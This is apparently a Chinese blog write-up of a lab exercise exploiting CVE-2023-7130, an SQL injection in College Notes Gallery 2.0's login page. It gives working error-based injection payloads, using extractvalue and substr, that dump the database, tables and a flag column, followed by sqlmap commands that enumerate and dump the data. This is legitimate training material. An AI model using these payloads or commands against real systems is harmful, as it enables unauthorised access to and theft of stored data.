春秋云境CVE-2023-7130

简介

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.

正文

这关有我用了两种办法,第一种是用报错注入进行手注,第二种就是sqlmap

首先进入靶场我们就可以看到有个login登录的按键,直接点进去。

第一种,报错注入

进入登录界面那就直接开始测试,我们进来就看到这里有个报错,那么就很明显的知道这里可以用报错注入。那么就开始测闭合,发现是单引号闭合。

爆数据库名

1'+and+(extractvalue(1,concat(0x7e,(select+database()),0x7e)))=1--+

爆表名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables+where+table_schema='notes'),0x7e)))=1--+

爆列名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(column_name)from+information_schema.columns+where+table_schema='notes'+and+table_name='flllaaaag'),0x7e)))=1--+

爆内容

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(flag)from+flllaaaag),0x7e)))=1--+

注意

这里因为报错注入输出是有限制长度的,所以我们需要用截断函数来把后面的的内容显示出来。

1'+and+(extractvalue(1,concat(0x7e,substr((select+group_concat(flag)from+flllaaaag),20,40),0x7e)))=1--+

第二种方式sqlmap

爆库名

python sqlmap.py -r 2.txt -batch -dbs

爆表名

python sqlmap.py -r 2.txt -batch -D notes -tables

爆列名

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -columns

爆数据

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -C flag -dump

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值